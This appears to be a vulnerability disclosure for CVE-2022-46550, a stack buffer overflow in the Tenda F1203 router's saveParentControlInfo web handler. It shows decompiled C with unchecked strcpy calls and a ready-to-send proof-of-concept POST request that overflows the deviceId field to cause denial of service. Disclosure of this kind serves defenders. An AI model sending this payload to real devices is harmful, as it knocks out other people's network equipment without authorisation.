aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
    aaaa

CVE-2022-46550: CVE-vulns/saveParentControlInfo_urls.md at main · Double-q1015/CVE-vulns

Tenda F1203 V2.0.1.6 was discovered to contain a buffer overflow via the deviceId parameter at /goform/saveParentControlInfo.

Tenda Router **F1203 V2.0.1.6** was discovered to contain a buffer overflow in the httpd module when handling /goform/saveParentControlInfo request.

This vulnerability lies in the /goform/saveParentControlInfo page，The details are shown below:

    int __fastcall saveParentControlInfo(int a1)
    {
      int v2; // $v0
      int v3; // $v0
      void *dest; // [sp+30h] [+30h] BYREF
      void *ptr; // [sp+34h] [+34h]
      int v6; // [sp+38h] [+38h]
      int v7; // [sp+3Ch] [+3Ch]
      int i; // [sp+40h] [+40h]
      int v9; // [sp+44h] [+44h]
      int v10; // [sp+48h] [+48h]
      char *nptr; // [sp+4Ch] [+4Ch]
      char *v12; // [sp+50h] [+50h]
      char *v13; // [sp+54h] [+54h]
      char *urls_value; // [sp+58h] [+58h]
      char *v15; // [sp+5Ch] [+5Ch]
      char *time_value; // [sp+60h] [+60h]
      char *v17; // [sp+68h] [+68h]
      char *deviceId_value; // [sp+6Ch] [+6Ch]
      char v19[64]; // [sp+70h] [+70h] BYREF
      char v20[512]; // [sp+B0h] [+B0h] BYREF
      int v21; // [sp+2B0h] [+2B0h] BYREF
      __int16 v22; // [sp+2B4h] [+2B4h] BYREF
      unsigned __int8 v23; // [sp+2B6h] [+2B6h] BYREF
      char v24[120]; // [sp+2B8h] [+2B8h] BYREF
      char v25[128]; // [sp+330h] [+330h] BYREF
      int v26; // [sp+3B0h] [+3B0h] BYREF
      int v27[5]; // [sp+3B4h] [+3B4h] BYREF
      int v28[8]; // [sp+3C8h] [+3C8h] BYREF
      int v29[8]; // [sp+3E8h] [+3E8h] BYREF
    
      memset(v19, 0, sizeof(v19));
      memset(v20, 0, sizeof(v20));
      v21 = 0;
      v22 = 0;
      v23 = 0;
      deviceId_value = (char *)websGetVar(a1, "deviceId", &unk_4CE8D8);
      v17 = (char *)websGetVar(a1, "enable", &unk_4CE8D8);
      time_value = (char *)websGetVar(a1, "time", &unk_4CE8D8);
      v15 = (char *)websGetVar(a1, "url_enable", &unk_4CE8D8);
      urls_value = (char *)websGetVar(a1, "urls", &unk_4CE8D8);
      v13 = (char *)websGetVar(a1, "day", &unk_4CE8D8);
      v12 = (char *)websGetVar(a1, "block", &unk_4CE8D8);
      nptr = (char *)websGetVar(a1, "connectType", &unk_4CE8D8);
      if ( atoi(nptr) == 1 && atoi(v12) == 1 )
        wl_l2_filter_add(deviceId_value);
      if ( *time_value )
      {
        v28[0] = 0;
        v28[1] = 0;
        v28[2] = 0;
        v28[3] = 0;
        v28[4] = 0;
        v28[5] = 0;
        v28[6] = 0;
        v28[7] = 0;
        v29[0] = 0;
        v29[1] = 0;
        v29[2] = 0;
        v29[3] = 0;
        v29[4] = 0;
        v29[5] = 0;
        v29[6] = 0;
        v29[7] = 0;
        sscanf(time_value, "%[^-]-%s", v28, v29);
        if ( !strcmp((const char *)v28, (const char *)v29) )
        {
          websWrite(
            a1,
            "HTTP/1.1 200 OK\nContent-type: text/plain; charset=utf-8\nPragma: no-cache\nCache-Control: no-cache\n\n");
          websWrite(a1, "{\"errCode\":%d}", 1);
          return websDone(a1, 200);
        }
      }
      v10 = 0;
      v9 = 0;
      i = 0;
      memset(v24, 0, sizeof(v24));
      memset(v25, 0, sizeof(v25));
      v7 = 0;
      v26 = 0;
      v6 = 0;
      ptr = malloc(0x254u);
      memset(ptr, 0, 0x254u);
      strcpy((char *)ptr + 2, deviceId_value);
      dest = malloc(0x254u);
      memset(dest, 0, 0x254u);
      *(_WORD *)dest = atoi(v17) != 0;
      strcpy((char *)dest + 2, deviceId_value);
      strcpy((char *)dest + 34, time_value);
      sscanf(
        v13,
        "%d,%d,%d,%d,%d,%d,%d",
        &v21,
        (char *)&v21 + 1,
        (char *)&v21 + 2,
        (char *)&v21 + 3,
        &v22,
        (char *)&v22 + 1,
        &v23);
      if ( !(_BYTE)v21
        && __PAIR16__(BYTE1(v21), 0) == BYTE2(v21)
        && __PAIR16__(HIBYTE(v21), 0) == (unsigned __int8)v22
        && __PAIR16__(HIBYTE(v22), 0) == v23
        && !*v12 )
      {
        for ( i = 0; i < 7; ++i )
          *((_BYTE *)dest + i + 66) = 1;
      }
      else
      {
        for ( i = 0; i < 7; ++i )
          *((_BYTE *)dest + i + 66) = *((_BYTE *)&v21 + i) != 0;
      }
      v2 = atoi(time_value);
      *((_DWORD *)dest + 19) = v2;
      strcpy((char *)dest + 80, urls_value);
      v3 = atoi(v15);
      *((_BYTE *)dest + 592) = v3 != 0;
      v10 = getparentcontrolinfo(0, &v26, ptr);
      if ( v10 <= 0 )
      {
        if ( !atoi(v17) && atoi(v12) != 1 )
        {
    LABEL_28:
          free(ptr);
          free(dest);
          websWrite(
            a1,
            "HTTP/1.1 200 OK\nContent-type: text/plain; charset=utf-8\nPragma: no-cache\nCache-Control: no-cache\n\n");
          websWrite(a1, "{\"errCode\":%d}", 0);
          return websDone(a1, 200);
        }
        if ( *v12 )
        {
          v6 = atoi(v12);
          if ( v6 == 1 )
          {
            *(_BYTE *)dest = 0;
            *((_BYTE *)dest + 1) = 1;
            for ( i = 0; i < 7; ++i )
              *((_BYTE *)dest + i + 66) = 1;
            strcpy((char *)dest + 34, "00:00-24:00");
          }
        }
        v9 = bm_get_id_list("parent.control.id", v24, 30);
        if ( v9 )
        {
          if ( v9 >= 30 )
          {
            free(ptr);
            free(dest);
            websWrite(
              a1,
              "HTTP/1.1 200 OK\nContent-type: text/plain; charset=utf-8\nPragma: no-cache\nCache-Control: no-cache\n\n");
            websWrite(a1, "{\"errCode\":%d}", 1);
            return websDone(a1, 200);
          }
          for ( i = 0; i != 30; ++i )
          {
            if ( !*(&dest + i + 162) )
            {
              v26 = i + 1;
              break;
            }
          }
          GetValue("parent.control.id", v20);
          sprintf(v25, "%s,%d", v20, v26);
          SetValue("parent.control.id", v25);
          setparentcontrolinfo(v10, v26, dest);
        }
        else
        {
          SetValue("parent.control.id", "1");
          v26 = 1;
          setparentcontrolinfo(v10, 1, dest);
        }
      }
      else
      {
        if ( atoi(v17) )
        {
          *((_DWORD *)dest + 19) = *((_DWORD *)ptr + 19);
        }
        else
        {
          memcpy(dest, ptr, 0x254u);
          *(_BYTE *)dest = 0;
        }
        if ( *v12 )
        {
          v6 = atoi(v12);
          memcpy(dest, ptr, 0x254u);
          if ( v6 == 1 )
          {
            *(_BYTE *)dest = 0;
            *((_BYTE *)dest + 1) = 1;
          }
          else
          {
            *((_BYTE *)dest + 1) = 0;
          }
        }
        if ( !memcmp(ptr, dest, 0x254u) )
          goto LABEL_28;
        setparentcontrolinfo(v10, v26, dest);
      }
      free(ptr);
      free(dest);
      v27[0] = 0;
      v27[1] = 0;
      v27[2] = 0;
      v27[3] = 0;
      v27[4] = 0;
      sprintf((char *)v27, "op=%d", 5);
      send_msg_to_netctrl(14, v27);
      send_msg_to_netctrl(41, v27);
      CommitCfm();
      websWrite(
        a1,
        "HTTP/1.1 200 OK\nContent-type: text/plain; charset=utf-8\nPragma: no-cache\nCache-Control: no-cache\n\n");
      websWrite(a1, "{\"errCode\":%d}", 0);
      return websDone(a1, 200);
    }
    

This POC can result in a Dos.

    POST /goform/saveParentControlInfo HTTP/1.1
    Host: 192.168.204.143
    Cache-Control: max-age=0
    Upgrade-Insecure-Requests: 1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.134 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Cookie: user=admin
    Connection: close
    Content-Length: 4106
    
    deviceId=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
    aaaa

Tag

#chrome